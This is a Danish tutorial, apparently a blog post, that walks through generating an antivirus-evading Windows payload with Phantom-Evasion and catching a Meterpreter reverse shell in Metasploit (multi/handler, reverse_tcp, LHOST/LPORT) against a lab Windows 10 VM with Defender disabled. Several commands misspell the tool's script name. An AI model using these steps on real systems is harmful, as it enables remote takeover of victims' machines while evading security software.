Download and installation

Åben en terminal I Kali og skriv:

git clone https://github.com/oddcod3/Phantom-Evasion

Skriv: cd Phantom-Evasion for at tilgå folderen. Skriv ls for at se indhold i folderen

Automatisk opsætning/installation skriv: python2 panthom-evasion –setup

Når installationen er færdig, skriv: python3 panthom-evasion.py eller ./pythom-evasion.py

Menuen ser sådan ud.

---

---

Brug af Phantom Evasion

Der er rigtig mange forskellige muligheder til at lave payloads. Jeg vil gennemgå hvordan man laver en Windows x64 http Stager.

Vælg 1

Vælg 3

Følg min konfiguration, der hvor der ikke står noget har jeg trykket Enter. Læg mærker til at jeg ikke bruger certifikat (rød firkant), da den ikke virker.

Når genereringen af koden er færdig, vil menuen vises, tryk 0 for exit. Skriv ls nu kan du se test.exe filen som er blevet genereret.

---

Start en ny terminal og skriv: msfconsole. Når msfconsole er startet skriv: use multi/handler

Skriv: show options

Skriv: set payload windows/x64/meterpreter/reverse_tcp

Skriv: set LHOST 192.168.1.82 (Den IP adresse vi skrev i phantom evasion)

Skriv: set LPORT 443 (Den port vi skrev i phantom evasion)

Skriv: show options Skriv: run –j (Køre i baggrunden)

Nu skal vi kopier test.exe til en virtual Windows 10 hvor Defender er disbaled. Kør test.exe, kort efter kan du se i msf konsollen en Meterpreter session er åbnet. Wupti nu har vi overtaget Windows maskinen.